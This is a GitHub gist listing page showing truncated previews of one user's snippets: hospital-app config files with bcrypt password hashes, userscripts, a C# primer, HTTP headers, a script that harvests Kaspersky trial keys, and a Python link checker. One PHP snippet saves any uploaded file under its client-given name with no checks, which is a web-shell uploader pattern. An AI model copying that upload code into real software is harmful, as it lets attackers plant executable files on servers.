Skip to content

Instantly share code, notes, and snippets.

@FrozenFrog
FrozenFrog / V3.0
Last active April 19, 2025 02:57
NhapVienApplication
allow=false
version=V3.0
password=$2a$10$SCiP7ciMBBVSMi02l0LXdO0uIHwuO7IT38swWug7I0OrtMwzPYtpm
additionalforbidden=- Cá nhân:BS Uyên không được sử dụng phần mềm
@FrozenFrog
FrozenFrog / NhapVienV3.txt
Last active February 10, 2025 14:13
NhapVienV3
allow=false
password=$2a$10$ji5.VwJqweCPG8vJri6MYu8B.jJfUai7wjLXGbykGhZesyARrr5iK
additionalforbidden=- Cá nhân: BS Uyên không được sử dụng phần mềm
<?php
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
@FrozenFrog
FrozenFrog / Imagus for foody.vn
Last active December 22, 2016 04:23
Imagus for foody.vn
img: ^(media\.foody\.vn\/res\/.+\/(?!s\/))(?:.+\/)(.+)
to: $1s/$2
@FrozenFrog
FrozenFrog / Redirect remover.js
Created August 18, 2016 19:27
My custom Redirect remover
// ==UserScript==
// @name Redirect remover (Custom)
// @version 1.0
// @description Tính năng: xoá redirect link, click recaptcha
// @namespace FrozenFrog
// @author FrozenFrog
// @run-at document-start
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js
// @grant GM_addStyle
// @icon http://i.imgur.com/cnWhhD8.png
@FrozenFrog
FrozenFrog / c_sharp_for_python.md
Last active August 1, 2016 12:11 — forked from mrkline/c_sharp_for_python.md
An intro to C# for a Python developer.

C# For Python Programmers

Syntax and core concepts

Basic Syntax

  • Single-line comments are started with //. Multi-line comments are started with /* and ended with */.

  • C# uses braces ({ and }) instead of indentation to organize code into blocks. If a block is a single line, the braces can be omitted. For example,

Request URL:http://uploaded.net/io/import
Request Method:POST
Status Code:200 OK
Remote Address:81.171.123.200:80
Response Headers
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection:keep-alive
Content-Encoding:gzip
Content-Type:application/javascript; charset=ISO-8859-1
Date:Sat, 02 Jul 2016 01:10:12 GMT
@FrozenFrog
FrozenFrog / KTS.js
Last active July 31, 2016 16:55
Tampermonkey script automate get Kaspersky 3 months key on Chrome
// ==UserScript==
// @name KTS
// @namespace onedollarlesson.com
// @description onedollarlesson.com
// @include http://onedollarlesson.com/
// @version 1
// @run-at document-idle
// @require https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.js
// @grant unsafeWindow
// @grant GM_xmlhttpRequest
@FrozenFrog
FrozenFrog / simulate_keypress.js
Created July 22, 2016 04:13 — forked from ejoubaud/simulate_keypress.js
Simulate keypress that works in Google nav in Chrome
// Based on http://stackoverflow.com/a/10520017/1307721 and http://stackoverflow.com/a/16022728/1307721
Podium = {};
Podium.keydown = function(k) {
var oEvent = document.createEvent('KeyboardEvent');
// Chromium Hack
Object.defineProperty(oEvent, 'keyCode', {
get : function() {
import requests
def main():
header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
url = input("Nhap link: ")
urlToBeCheck = "http://get4all.org/api/check/?uri=" + url
checkProcess = requests.get(urlToBeCheck, headers=header)
result = checkProcess.json()
if result['code'] == 1:
print("Live")